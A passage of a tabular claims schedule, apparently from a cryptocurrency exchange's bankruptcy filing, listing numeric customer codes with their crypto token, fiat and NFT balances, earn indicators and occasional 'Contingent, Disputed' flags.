| 07378688 | | USD[10.00] | | |
| 07378689 | | BAT[1.0165555], BRZ[1], CUSDT[3], DOGE[9644.49192154], LINK[1.08664553], SHIB[6259478.98395706], USD[0.00], USDT[0] | Yes | |
| 07378690 | | BRZ[3], CUSDT[11], TRX[15], USD[0.00], USDT[1] | | |
| 07378691 | | CUSDT[3], DOGE[1], TRX[1], USD[0.01], USDT[1] | | |
| 07378692 | | NFT (318853312416831342/Bahrain Ticket Stub #1572)[1], NFT (340651052078310673/Hungary Ticket Stub #175)[1], SOL[.23693214], USD[0.00] | | |
| 07378693 | | BTC[.00325034], DOGE[1], USD[0.00] | | |
| 07378694 | | BRZ[1], CUSDT[2], DOGE[6025.4288977], TRX[1], USD[460.00] | | |
| 07378695 | | CUSDT[1], DOGE[.00002743], USD[0.00] | Yes | |
| 07378696 | | ETH[.00634929], ETHW[.00634929], USD[0.00] | | |
| 07378697 | | DOGE[0], USD[149.39] | Yes | |
| 07378698 | | DOGE[134.87218904], USD[0.00] | | |
| 07378699 | | BTC[.01020899], CUSDT[2], DOGE[1089.86199747], TRX[393.45962556], USD[0.00] | | |
| 07378700 | | DOGE[138.2494659], TRX[1], USD[0.00] | | |
| 07378701 | | USD[0.01] | | |
| 07378702 | | CUSDT[2], DOGE[163.2989402], USD[0.10] | | |
| 07378703 | | USD[10.00] | | |
| 07378704 | | USD[10.00] | | |
| 07378705 | | USD[10.00] | | |
| 07378706 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07378707 | | USD[50.00] | | |
| 07378708 | | BCH[0], BTC[.00000238], ETH[0.00067903], ETHW[0.20393588], USD[0.89] | | |
| 07378710 | | USD[10.00] | | |
| 07378711 | | USD[10.00] | | |
| 07378712 | | BF_POINT[700], BTC[.00656362], DOGE[2339.13816828], ETH[.11255714], LTC[9.61840812], SHIB[10760409.19506417], USD[130.56], USDT[0] | Yes | |
| 07378713 | | USD[10.00] | | |
| 07378714 | | BCH[0], USD[0.00] | | |
| 07378715 | | CUSDT[1], DOGE[1359.89145571], USD[0.00] | | |
| 07378716 | | USD[10.00] | | |
| 07378717 | | USD[10.00] | | |
| 07378718 | | USD[10.00] | | |
| 07378719 | | USD[10.00] | | |
| 07378720 | | CUSDT[2], DOGE[94.97715179], ETH[0], USD[0.00] | Yes | |
| 07378721 | | BRZ[2], CUSDT[4], DOGE[0], TRX[5], USD[0.00] | | |
| 07378722 | | USD[10.00] | | |
| 07378723 | | USD[10.00] | | |
| 07378724 | | USD[10.00] | | |
| 07378725 | | CUSDT[2], DOGE[1], TRX[202.75998381], USD[0.00] | | |
| 07378727 | | BTC[.03575358], CUSDT[2], DOGE[1.12746515], USD[0.00] | Yes | |
| 07378728 | | CUSDT[1], DOGE[1874.36707624], SHIB[300842.35860409], USD[0.00] | | |
| 07378729 | | BAT[1], BCH[0], BRZ[6], CUSDT[36], DOGE[11], GRT[3], SHIB[5], TRX[10.73738374], USD[0.00], USDT[0] | | |
| 07378730 | | DOGE[.00932123], USD[2.67] | | |
| 07378731 | | USD[0.00], USDT[0] | | |
| 07378732 | | CUSDT[1], DOGE[25.46344708], USD[0.00] | | |
| 07378733 | | CUSDT[4], DOGE[.00036392], TRX[2], USD[0.00] | | |
| 07378734 | | USD[10.00] | | |
| 07378735 | | USD[10.00] | | |
| 07378736 | | DOGE[1], USD[0.00] | | |
| 07378737 | | CUSDT[1], USD[0.00] | | |
| 07378738 | | USD[10.00] | | |
| 07378739 | | USD[10.00] | | |
| 07378740 | | CUSDT[2], ETH[.03299775], ETHW[.03299775], USD[0.00] | | |
| 07378741 | | CUSDT[2], DOGE[165.08525372], TRX[1], USD[0.00] | Yes | |
| 07378743 | | USD[10.00] | | |
| 07378744 | | CUSDT[2], DOGE[.00001345], TRX[3], USD[0.00] | | |
| 07378745 | | CUSDT[2], DOGE[1033.60959997], USD[0.00] | | |
| 07378747 | | BRZ[2], CUSDT[20], TRX[6], USD[0.01] | | |
| 07378748 | | USD[10.00] | | |
| 07378749 | | USD[10.00] | | |
| 07378750 | | USD[10.00] | | |
| 07378751 | | BAT[1], BRZ[4], CUSDT[3], DOGE[.0078723], ETH[.00000169], ETHW[.00000169], GRT[1], SHIB[1], TRX[5.11274698], USD[0.01], USDT[3] | | |
| 07378752 | | USD[0.00] | | |
| 07378753 | | DOGE[454.30457741], USD[0.00] | | |
| 07378754 | | USD[10.00] | | |
| 07378755 | | BAT[1.0165555], BCH[.07955281], BRZ[5], CUSDT[11], DOGE[2], ETH[.00000137], ETHW[.00000137], MATIC[355.84243107], SHIB[20507651.16563361], TRX[2.07810335], USD[1.63] | Yes | |
| 07378756 | | ETH[.00369082], ETHW[.00369082], LTC[.05], USD[0.00] | | |
| 07378758 | | USD[10.00] | | |
| 07378759 | | CUSDT[13], SHIB[2], TRX[4], USD[87.27], USDT[0] | | |
| 07378760 | | USD[10.00] | | |
| 07378761 | | BCH[0], BTC[0], DOGE[0], LTC[0.00001781], PAXG[0], SOL[0.00039542], TRX[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07378762 | | DOGE[0], GRT[0], SHIB[38.11566566], UNI[0], USD[0.00] | Yes | |
| 07378764 | | USD[10.00] | | |
| 07378765 | | USD[10.00] | | |
| 07378766 | | ETH[0], USD[0.00] | | |
| 07378767 | | BTC[0], CUSDT[0], DOGE[0.00024949], ETH[0], GRT[0], KSHIB[167.40552299], SUSHI[0], TRX[0], USD[0.00] | Yes | |
| 07378768 | | BRZ[1], DOGE[130.32382183], PAXG[.00000023], SOL[.00000001], TRX[2917.78115244], USD[0.00] | Yes | |
| 07378769 | | USD[10.00] | | |
| 07378770 | | CUSDT[2], DOGE[11887.86564616], TRX[7634.78596365], USD[0.50] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07378771 | | USD[0.00] | | |
| 07378772 | | BRZ[3], DOGE[7], ETH[0], LTC[0], NFT (296979883662162803/Entrance Voucher #7503)[1], NFT (31512744410424012/PeskyPenguins.io)[1], NFT (31554301358681835/Cove #209)[1], NFT (38787181868758348/1/Pesky Crystal)[1], NFT (40096117900474637/7/Cove #3898)[1], NFT (41583929386717468/1/Pesky Penguin #367)[1], NFT (42838058422620553/2/Citizen 7#1320)[1], NFT (44030114826856216/0/Cove #650)[1], NFT (48794187881745376/7/NI-E the Glitchy)[1], SHIB[18], SOL[0.02600893], TRX[5.53707987], USD[0.01], USDT[1] | | |
| 07378773 | Contingent, Disputed | BAT[0], BCH[0], BRZ[0], BTC[0], CAD[0.00], DAI[0], DOGE[7.21146094], ETH[0], GBP[0.00], GRT[0], KSHIB[0], LINK[0], LTC[0], MATIC[0], MKR[0], SOL[0], TRX[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07378774 | | USD[10.00] | | |
| 07378775 | | CUSDT[1], USD[0.01] | | |
| 07378776 | | CUSDT[2], DOGE[27.60329135], USD[0.00] | | |
| 07378777 | | DOGE[30.22336756], TRX[2], USD[0.00] | | |
| 07378778 | | BRZ[7], CUSDT[161], DOGE[8197.85407783], SOL[9.30035556], SUSHI[43.52455643], TRX[26.19009766], USD[0.00] | | |
| 07378779 | | CUSDT[1], DOGE[139.33707044], USD[0.00] | | |
| 07378780 | | UNI[.00000001], USD[0.01] | | |
| 07378781 | | USD[10.00] | | |
| 07378783 | | BRZ[5.07952967], BTC[0], CUSDT[14], DOGE[0], ETH[0], GRT[2.00605185], SHIB[1], TRX[9.01851208], USD[0.01], USDT[0] | Yes | |
| 07378784 | | USD[10.04] | | |
| 07378785 | | BRZ[1], DOGE[2460.61569279], USD[10.00] | | |
| 07378786 | | USD[0.00] | Yes | |
| 07378787 | | USD[10.00] | | |
| 07378788 | | USD[10.00] | | |
| 07378789 | | USD[10.00] | | |
| 07378790 | | USD[0.01] | | |
| 07378791 | | BRZ[5.07952967], CUSDT[13], DOGE[18460.58234792], ETH[0.88508208], ETHW[0.88471040], GRT[2.06558751], MATIC[214.87894291], SHIB[4221751.96695703], TRX[26035.93385048], USD[0.00], USDT[2.19981519] | Yes | |
| 07378792 | | DOGE[652.60741461], TRX[1], USD[10.00] | | |
| 07378793 | | CUSDT[2], USD[0.00] | Yes | |
| 07378794 | | DOGE[1.00696127], TRX[1], USD[0.33] | | |
| 07378795 | | GRT[1], USD[0.00] | | |
| 07378796 | | USD[10.00] | | |
| 07378797 | | BTC[.00021423], DOGE[.94677], USD[0.00] | | |
| 07378798 | | USD[0.00], USDT[38.27988733] | Yes | |
| 07378800 | | CUSDT[1], LTC[0], USD[0.00] | | |
| 07378801 | | CUSDT[15], USD[0.01], USDT[0] | | |
| 07378802 | | USD[0.00] | Yes | |
| 07378803 | | USD[10.00] | | |
| 07378804 | | USD[10.00] | | |
| 07378805 | | BRZ[1], CUSDT[1], DOGE[4035.93611031], ETH[0.31986163], ETHW[0.31986163], LTC[0], TRX[2], USD[0.00] | | |
| 07378806 | | USD[0.55] | | |
| 07378808 | | USD[10.00] | | |
| 07378809 | | USD[10.00] | | |
| 07378810 | | BRZ[1], BTC[0.00737203], CUSDT[3], ETH[.56368505], ETHW[.56344815], GRT[1.00498957], TRX[.000001], USD[0.00] | Yes | |
| 07378811 | | DOGE[90.48001821], USD[0.00] | | |
| 07378812 | | BRZ[2.88405082], CUSDT[1], DOGE[1544.70500739], SHIB[2], TRX[2], USD[0.53], USDT[0] | | |
| 07378813 | | CUSDT[2], DOGE[2180.60547151], TRX[2], USD[0.00] | | |
| 07378814 | | GRT[307.764], SOL[.08], SUSHI[18.426], USD[0.44] | | |
| 07378815 | | USD[10.00] | | |
| 07378816 | | USD[10.00] | | |
| 07378819 | | CUSDT[1], DOGE[832.86686068], TRX[1], USD[0.00] | | |
| 07378820 | | BRZ[1], CUSDT[9], DAI[4.9527653], DOGE[0], SOL[0], TRX[2], UNI[0.85088322], USD[0.00], USDT[0.00000001] | | |
| 07378821 | | BTC[.01011984], CUSDT[1], DOGE[13737.61168754], ETH[.02364134], ETHW[.02364134], SUSHI[.51966722], TRX[1832.67719981], USD[100.00] | | |
| 07378822 | | USD[0.00] | | |
| 07378824 | | CUSDT[1], DOGE[527.60486146], USD[0.01] | | |
| 07378825 | | USD[10.00] | | |
| 07378827 | | USD[10.00] | | |
| 07378829 | | USD[20.00] | | |
| 07378830 | | DOGE[.322], USD[0.03], USDT[0] | | |
| 07378831 | | USD[10.41] | Yes | |
| 07378832 | | CUSDT[2], DOGE[126.4673721], TRX[1], USD[0.00] | | |
| 07378833 | | USD[10.00] | | |
| 07378835 | | DOGE[142.96493842], USD[0.00] | | |
| 07378836 | | DOGE[164.89408275], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07378837 | | DOGE[1], USD[101.17] | | |
| 07378838 | | USD[10.00] | | |
| 07378839 | | USD[0.01], USDT[1] | | |
| 07378841 | | USD[10.00] | | |
| 07378842 | | BTC[0.00027721], DOGE[1], USD[0.00] | | |
| 07378843 | | BTC[.00000001], DOGE[31.37609013], ETH[0.00000001], SHIB[26696920.42927255], TRX[1], USD[2.14], USDT[0] | Yes | |
| 07378844 | | USD[0.00] | Yes | |
| 07378845 | | USD[10.00] | | |
| 07378846 | | USD[10.00] | | |
| 07378847 | | BAT[92.35468584], DOGE[1598.9102982], TRX[1048.68211303], USD[0.24] | | |
| 07378848 | | USD[10.00] | | |
| 07378849 | | USD[10.00] | | |
| 07378850 | | USD[10.00] | | |
| 07378851 | | BAT[55.15731613], BRZ[1], CUSDT[2352.01447577], DOGE[7094.71441077], TRX[3], USD[125.04] | | |
| 07378852 | | BRZ[1], BTC[.00000002], CUSDT[3], LTC[.68564662], SHIB[2], TRX[.00003078], USD[0.00] | Yes | |
| 07378853 | | USD[10.00] | | |
| 07378854 | | BTC[.00042855], DOGE[128.29096118], ETH[.00612638], ETHW[.00612638], USD[0.00] | | |
| 07378855 | | USD[10.00] | | |
| 07378856 | | BTC[0.03137729], DOGE[1842.21272096], ETH[.02902047], ETHW[.02902047], SUSHI[7.42863971], TRX[1912.36320402], USD[0.00], USDT[0] | | |
| 07378857 | | CUSDT[2], USD[0.00], USDT[0.00000001] | | |
| 07378858 | | BTC[0.00004638], SOL[.996], USD[32.88], USDT[1.18930280] | | |
| 07378859 | | USD[10.00] | | |
| 07378860 | | BTC[0], DOGE[0], USD[1.33] | | |
| 07378861 | | CUSDT[195.04836309], USD[0.00] | | |
| 07378862 | | USD[0.00] | | |
| 07378863 | | DOGE[134.86664116], USD[0.00] | | |
| 07378864 | | BRZ[1], CUSDT[2], DOGE[7470.13587854], GRT[386.82882909], KSHIB[574.11565138], LINK[.44822555], TRX[6739.82889838], USD[37.13] | | |
| 07378866 | | CUSDT[1], DOGE[32.72661643], LTC[.11470528], USD[21.35] | | |
| 07378867 | | TRX[1], USD[0.01] | | |
| 07378869 | | CUSDT[1], DOGE[2925.13602355], TRX[220.62581982], USD[0.24] | | |
| 07378870 | | BCH[0], BRZ[0], BTC[0], DAI[0], DOGE[0], ETH[0], ETHW[0], KSHIB[0], PAXG[0], SHIB[7658.37713952], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07378871 | | USD[10.00] | | |
| 07378872 | | USD[10.00] | | |
| 07378874 | | CUSDT[1], DOGE[1.00010554], USD[0.01] | | |
| 07378875 | | USD[10.00] | | |
| 07378876 | | USD[10.00] | | |
| 07378877 | | USD[8.30] | | |
| 07378878 | | BRZ[1], DOGE[1632.73304303], USD[17.80] | Yes | |
| 07378879 | | CUSDT[4], USD[0.00] | | |
| 07378880 | | DOGE[4.02113316], LTC[0], SUSHI[0], TRX[1], UNI[0], USD[0.01] | Yes | |
| 07378881 | | USD[10.00] | | |
| 07378882 | | BAT[10.03068722], BRZ[56.99388165], BTC[.00035437], CUSDT[2519.32662802], DOGE[2137.40378926], GRT[10.37593409], LINK[2.29624126], USD[0.00], USDT[35.42365297] | | |
| 07378883 | | BTC[.00016912], DOGE[2929.49130555], SHIB[6649118.89314349], USD[0.00] | Yes | |
| 07378884 | | BTC[0], DOGE[1], USD[0.00] | | |
| 07378885 | | DOGE[23.45653671], USD[0.00], USDT[0] | | |
| 07378886 | | USD[10.00] | | |
| 07378887 | | DOGE[397.73104398], SHIB[279177.53604903], USD[0.02] | Yes | |
| 07378889 | | USD[10.00] | | |
| 07378890 | | USD[10.00] | | |
| 07378892 | | USD[10.00] | | |
| 07378893 | | BTC[0.00181076], CUSDT[4], ETH[.0149074], ETHW[.01472064], LTC[.5338836], SOL[1.39258835], USD[223.82] | Yes | |
| 07378894 | | USD[10.00] | | |
| 07378895 | | USD[10.00] | | |
| 07378896 | | USD[10.00] | | |
| 07378897 | | DOGE[154.86596065], USD[0.00] | | |
| 07378898 | | DOGE[.0002007], TRX[1], USD[0.00] | | |
| 07378899 | | USD[10.00] | | |
| 07378900 | | CUSDT[3], TRX[682.35152947], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07378901 | | DOGE[1352.75494718], NFT (493884296205934479/Imola Ticket Stub #1480)[1], SHIB[10852.79325189], USD[0.00], USDT[0] | Yes | |
| 07378902 | | CUSDT[3], DOGE[1907.47577311], KSHIB[699.0457187], SHIB[561088.51171272], SOL[3.01192185], TRX[2], USD[0.00] | | |
| 07378903 | | SOL[.90693256], USD[0.00] | | |
| 07378905 | | TRX[0], USD[0.00] | | |
| 07378906 | | USD[10.00] | | |
| 07378907 | | USD[10.00] | | |
| 07378908 | | CUSDT[6], DOGE[1.00003709], SOL[.00076305], SUSHI[.00095135], TRX[2], USD[0.03] | | |
| 07378909 | | USD[10.00] | | |
| 07378910 | | BRZ[2], BTC[0], CUSDT[3.63895453], DOGE[3], TRX[0], USD[0.74] | | |
| 07378911 | | DOGE[.59405051], SHIB[2], USD[0.00] | | |
| 07378912 | | USD[10.00] | | |
| 07378913 | | USD[10.00] | | |
| 07378914 | | USD[10.00] | | |
| 07378915 | | DOGE[1.02537156], USD[0.00] | | |
| 07378916 | | USD[10.00] | | |
| 07378917 | | USD[10.00] | | |
| 07378918 | | BAT[14.64539822], DOGE[1], GRT[1], USD[2.76] | | |
| 07378919 | | DOGE[137.53004669], USD[0.00] | Yes | |
| 07378920 | | CUSDT[2], USD[0.01] | | |
| 07378921 | | BTC[0], CUSDT[3], GRT[546.30286951], USD[0.00] | Yes | |
| 07378922 | | DOGE[0], TRX[2], USD[0.01] | | |
| 07378924 | | BAT[1], CUSDT[3], DOGE[287.45553134], GRT[1], SHIB[5418868.05347051], USD[0.11] | | |
| 07378925 | | USD[0.00] | | |
| 07378926 | | USD[10.00] | | |
| 07378927 | | BTC[0], CUSDT[0], DOGE[0], TRX[0], USD[0.00], USDT[0] | | |
| 07378928 | | USD[10.00] | | |
| 07378929 | | BRZ[1], CUSDT[24], TRX[.83814369], USD[30.35] | | |
| 07378930 | | CUSDT[1], DOGE[3455.46535266], USD[0.00] | | |
| 07378931 | | CUSDT[1], DOGE[0], ETH[0], ETHW[0], GRT[0], USD[0.00], USDT[0] | | |
| 07378932 | | DOGE[1], USD[0.01] | Yes | |
| 07378933 | | USD[20.00] | | |
| 07378934 | | BAT[134.47527276], BRZ[6.63126451], CUSDT[520.26863257], DOGE[5220.53152711], GRT[1.00498957], TRX[375.53993248], USD[11.00], USDT[1.10351641] | Yes | |
| 07378935 | | USD[10.00] | | |
| 07378936 | | DOGE[137.54149798], TRX[1], USD[0.00] | | |
| 07378938 | | BAT[2], BCH[.00065858], BRZ[4], CUSDT[8], GRT[1], TRX[11], USD[0.00], USDT[3] | | |
| 07378939 | | BRZ[1], BTC[0], CUSDT[1], DOGE[0], ETH[0], GRT[0], LINK[0], SOL[0], TRX[0], USD[0.01], USDT[0], YFI[0] | Yes | |
| 07378940 | | SHIB[1], USD[19.13] | Yes | |
| 07378941 | | USD[10.00] | | |
| 07378943 | | USD[10.00] | | |
| 07378944 | | CUSDT[4], USD[0.00] | | |
| 07378945 | | USD[10.00] | | |
| 07378946 | | USD[10.00] | | |
| 07378947 | | USD[10.00] | | |
| 07378948 | | DOGE[.00002188], TRX[1], USD[0.00] | | |
| 07378949 | | USD[10.00] | | |
| 07378950 | | USD[10.00] | | |
| 07378952 | | CUSDT[1181.34322492], DOGE[2], TRX[4041.76959445], USD[10.00] | | |
| 07378953 | | DAI[0], DOGE[0], GRT[0], SHIB[32016045.89452919], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07378954 | | CUSDT[1], DOGE[0.42243926], SHIB[296887.46608327], TRX[.10591783], USD[0.00] | Yes | |
| 07378955 | | BRZ[1], CUSDT[1], DOGE[4731.44361467], LINK[1], TRX[2], USD[0.00] | | |
| 07378956 | | BRZ[1], CUSDT[1], USD[0.01] | | |
| 07378957 | Contingent, Disputed | DOGE[135.29915793], USD[0.00] | | |
| 07378958 | | BCH[.12233333], BRZ[1], DOGE[1.31448751], USD[0.57] | | |
| 07378959 | | USD[10.00] | | |
| 07378960 | | USD[10.00] | | |
| 07378961 | | USD[10.00] | | |
| 07378962 | | DOGE[129.01402963], USD[0.00] | | |
| 07378964 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07378965 | | DOGE[127.35291587], USD[1.00] | | |
| 07378966 | | DOGE[124.36392515], USD[0.00] | | |
| 07378967 | | DOGE[1267.31100296], SHIB[5269334.35610263], TRX[1], USD[0.00] | | |
| 07378968 | | USD[10.00] | | |
| 07378969 | | USD[10.00] | | |
| 07378970 | | USD[10.00] | | |
| 07378971 | | USD[10.00] | | |
| 07378972 | | USD[10.00] | | |
| 07378973 | | DOGE[19.66701127], GRT[2.53303042], USD[0.00] | | |
| 07378974 | | CUSDT[2], DOGE[469.36740978], TRX[494.36598171], USD[10.73] | | |
| 07378975 | | CUSDT[1], DOGE[298.1533843], USD[0.00] | | |
| 07378977 | | BAT[1], BRZ[1], BTC[0], CUSDT[1], DOGE[2], USD[0.01] | | |
| 07378978 | | CUSDT[10], DOGE[458.15889315], TRX[2], USD[0.00] | Yes | |
| 07378979 | | SHIB[61052843.16197105], UNI[168.63621055], USD[0.00], USDT[0] | Yes | |
| 07378980 | | CUSDT[5], TRX[3], USD[0.00] | | |
| 07378981 | | BRZ[2], DOGE[1], TRX[1], USD[0.01], USDT[1] | | |
| 07378982 | | DOGE[43.04316131], TRX[1], USD[0.00] | Yes | |
| 07378983 | | BRZ[2], BTC[0], CUSDT[2], DOGE[1], LTC[0], SOL[0], TRX[2], USD[0.00], USDT[1.10615995] | Yes | |
| 07378984 | | USD[10.00] | | |
| 07378985 | | USD[10.00] | | |
| 07378986 | | ETH[.00000449], ETHW[.00000449], USD[0.00] | | |
| 07378987 | | BRZ[1], CUSDT[3], DOGE[5579.75024429], USD[0.00] | | |
| 07378988 | | CUSDT[1], DOGE[1], USD[0.00] | Yes | |
| 07378989 | | USD[10.00] | | |
| 07378990 | | BRZ[0], DOGE[0], GRT[0], LINK[0], USD[0.00] | | |
| 07378991 | | USD[10.00] | | |
| 07378992 | | USD[10.00] | | |
| 07378994 | | USD[0.00] | | |
| 07378995 | | BAT[.00013425], BRZ[1], DOGE[.0030513], ETH[.00000052], ETHW[.00000052], SHIB[3], SOL[.00000302], TRX[4], UNI[.45475442], USD[0.00] | Yes | |
| 07378996 | | USD[10.00] | | |
| 07378998 | | CUSDT[2], GRT[1], TRX[1], USD[0.00] | | |
| 07378999 | | CUSDT[1], DOGE[163.23862565], USD[0.00] | | |
| 07379000 | | CUSDT[2], DOGE[3], TRX[1], USD[0.00] | | |
| 07379001 | | USD[11.05] | | |
| 07379002 | | BTC[.06054301], CUSDT[2], DOGE[19505.4449572], SHIB[11937663.28882148], TRX[4104.01349992], UNI[6.17001014], USD[0.00], USDT[0] | Yes | |
| 07379003 | | USD[10.00] | | |
| 07379004 | | BAT[1.01655549], CUSDT[6], LTC[.00001513], SHIB[4], SUSHI[5.05274085], TRX[2], USD[3.94], USDT[1.11030948] | Yes | |
| 07379005 | | USD[11.07] | Yes | |
| 07379006 | | CUSDT[1], DOGE[0], USD[0.01] | | |
| 07379007 | | DOGE[101.86548195], USD[0.01] | | |
| 07379008 | | BRZ[.94906059], CUSDT[2], DOGE[85.05474978], USD[0.00] | | |
| 07379009 | | DOGE[378.36036205], TRX[1], USD[0.00] | | |
| 07379010 | | USD[10.00] | | |
| 07379011 | | BRZ[0], CUSDT[1], DOGE[1], ETH[1.38782425], ETHW[1.38722876], SOL[31.50908874], USD[0.00], USDT[0.00000111] | Yes | |
| 07379013 | | BF_POINT[100], DOGE[30.80117597], NFT [569253478014255357/Travel sprouts collection #42][1], SHIB[1.00002148], USD[0.00] | Yes | |
| 07379014 | | BRZ[1], CUSDT[1], GRT[1], TRX[1], USD[0.01] | | |
| 07379015 | | USD[0.00] | | |
| 07379016 | | USD[10.00] | | |
| 07379017 | | BTC[.00051213], USD[0.00] | | |
| 07379019 | | USD[10.00] | | |
| 07379020 | | BTC[0], CUSDT[5], DOGE[0], ETH[0], LTC[.0000042], SOL[.00000928], USD[0.10], USDT[0] | Yes | |
| 07379021 | | USD[10.00] | | |
| 07379022 | | DOGE[1], USD[0.01] | | |
| 07379023 | | USD[10.00] | | |
| 07379024 | | USD[10.00] | | |
| 07379025 | | BTC[.00020436], USD[0.00] | | |
| 07379026 | | DOGE[155.81113965], USD[0.00] | Yes | |
| 07379027 | | BRZ[2], CUSDT[1], DOGE[12303.07846399], LTC[.00575362], SHIB[3243593.90204346], USD[9.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07379028 | | CUSDT[3], DOGE[3775.82265683], TRX[1], USD[0.38] | | |
| 07379029 | | USD[10.00] | | |
| 07379030 | | CUSDT[2], DOGE[1.91027866], USD[0.00] | | |
| 07379031 | | USD[10.00] | | |
| 07379032 | | DOGE[346.02852427], USD[5.00] | | |
| 07379033 | | CUSDT[3], DOGE[226.68438857], TRX[2], USD[0.00] | | |
| 07379034 | | TRX[211.35580947], USD[0.00] | | |
| 07379035 | | CUSDT[2], TRX[1], USD[120.79] | Yes | |
| 07379036 | | USD[10.00] | | |
| 07379037 | | USD[10.00] | | |
| 07379038 | | USD[10.00] | | |
| 07379039 | | USD[10.00] | | |
| 07379040 | | BRZ[3], BTC[.00428778], CUSDT[14], DOGE[7211.59487275], KSHIB[10775.98609898], SHIB[12595212.61119141], TRX[1.00004847], USD[0.18] | Yes | |
| 07379042 | | USD[10.00] | | |
| 07379043 | | CUSDT[1], DOGE[996.84791275], TRX[1], USD[0.00] | | |
| 07379044 | | USD[0.06], USDT[0.00000001] | | |
| 07379045 | | BCH[0.01373869], USD[0.00] | | |
| 07379046 | | KSHIB[0], SOL[0], USD[0.00] | Yes | |
| 07379047 | | CUSDT[3], DOGE[1951.77685547], USD[0.00] | | |
| 07379048 | | DOGE[147.98260246], USD[0.00] | Yes | |
| 07379049 | | USD[10.00] | | |
| 07379050 | | AVAX[.99657706], DOGE[2.21800034], ETH[.00000008], ETHW[.00000008], MATIC[52.19927896], USD[0.27] | Yes | |
| 07379051 | | BAT[4.29018632], BRZ[4], BTC[0.00207896], CUSDT[7], DOGE[2], ETH[2.93349111], ETHW[2.93239622], GRT[1.00272026], LINK[0], SOL[335.77716102], SUSHI[1.07591753], TRX[1.00003171], USD[15.52], USDT[2.15294179] | Yes | |
| 07379052 | | USD[10.00] | | |
| 07379053 | | BTC[0], ETH[0.01718685], ETHW[0.01718685], SOL[0], TRX[1], USD[0.00] | | |
| 07379054 | | CUSDT[1], DOGE[0], ETH[0], SOL[1.2266788], USD[0.00] | | |
| 07379055 | | USD[10.00] | | |
| 07379056 | | TRX[1], USD[0.00] | | |
| 07379057 | | DOGE[169.47434819], USD[0.00] | | |
| 07379058 | | CUSDT[1], DOGE[687.7506133], TRX[236.17921813], USD[0.00] | Yes | |
| 07379059 | | BRZ[1], CUSDT[4], GRT[2], USD[21.40], USDT[0] | | |
| 07379060 | | USD[10.00] | | |
| 07379061 | | USD[0.06] | | |
| 07379063 | | TRX[2], USD[0.00] | | |
| 07379064 | | USD[10.00] | | |
| 07379066 | | CUSDT[5], DOGE[498.82605622], ETH[.00930057], ETHW[.00930057], SHIB[1], USD[9.37] | | |
| 07379068 | | DOGE[136.67250921], USD[0.00] | | |
| 07379073 | | CUSDT[1], DOGE[232.35567088], TRX[1], USD[0.04] | | |
| 07379074 | | BAT[0], BRZ[7.6919516], CUSDT[42], DOGE[2], LTC[0], SOL[0], USD[0.01], USDT[1.10489796] | Yes | |
| 07379075 | | BRZ[2], CUSDT[6], DOGE[4499.17396181], ETH[.00000001], TRX[1], USD[0.00] | | |
| 07379076 | | BAT[1], BRZ[1], CUSDT[4], DOGE[4], GRT[1], LINK[1], SHIB[16334531.19895459], SOL[70.55434697], TRX[5], USD[0.00] | | |
| 07379077 | | BAT[1], BRZ[1], BTC[0], CUSDT[4], DOGE[27314.59103163], GRT[3], LINK[1], TRX[2], USD[0.00], USDT[2] | | |
| 07379079 | | BTC[.0001956], CUSDT[1], USD[0.00] | | |
| 07379080 | | BTC[.00021323], USD[0.00] | | |
| 07379081 | | USD[0.05] | | |
| 07379082 | | USD[10.00] | | |
| 07379084 | | USD[0.01] | | |
| 07379085 | | BRZ[2], CUSDT[4], DOGE[5031.53173857], ETH[.02059858], ETHW[.02059858], TRX[2], USD[29.08] | | |
| 07379086 | | USD[10.00] | | |
| 07379087 | | USD[10.00] | | |
| 07379088 | | TRX[10.26387275], USD[0.00] | Yes | |
| 07379089 | | LINK[18.33917137], MATIC[311.32407905], SOL[68.36620599], USD[0.00] | Yes | |
| 07379090 | | BTC[.00021115], DOGE[274.21370489], USD[0.00] | | |
| 07379093 | | CUSDT[2], DOGE[1], TRX[5], USD[0.00] | Yes | |
| 07379094 | | DOGE[11523.97037723], USD[4.59], USDT[0.00001009] | Yes | |
| 07379095 | | USD[10.00] | | |
| 07379096 | | BTC[0.00000142], DOGE[0], USD[0.00] | | |
| 07379098 | | USD[0.11] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07379100 | Contingent, Disputed | USD[0.00] | | |
| 07379101 | | DOGE[13.2989829], TRX[171.75544023], USD[0.00] | | |
| 07379102 | | BTC[.00008621], ETH[.0004373], ETHW[.0004373], TRX[1], USD[0.00] | Yes | |
| 07379104 | Contingent, Disputed | USD[10.00] | | |
| 07379105 | | USD[10.00] | | |
| 07379106 | | USD[10.00] | | |
| 07379107 | | USD[10.00] | | |
| 07379108 | | USD[10.00] | | |
| 07379109 | | USD[0.00] | | |
| 07379110 | | BAT[1], CUSDT[8], DOGE[3], ETH[.15197431], ETHW[.15197431], TRX[0], USD[0.00] | | |
| 07379111 | | BRZ[1], CUSDT[2], USD[0.00] | | |
| 07379112 | | BRZ[1], CUSDT[1], DOGE[1.42967743], TRX[2], USD[0.00] | | |
| 07379113 | | DOGE[135.77756484], USD[0.00] | | |
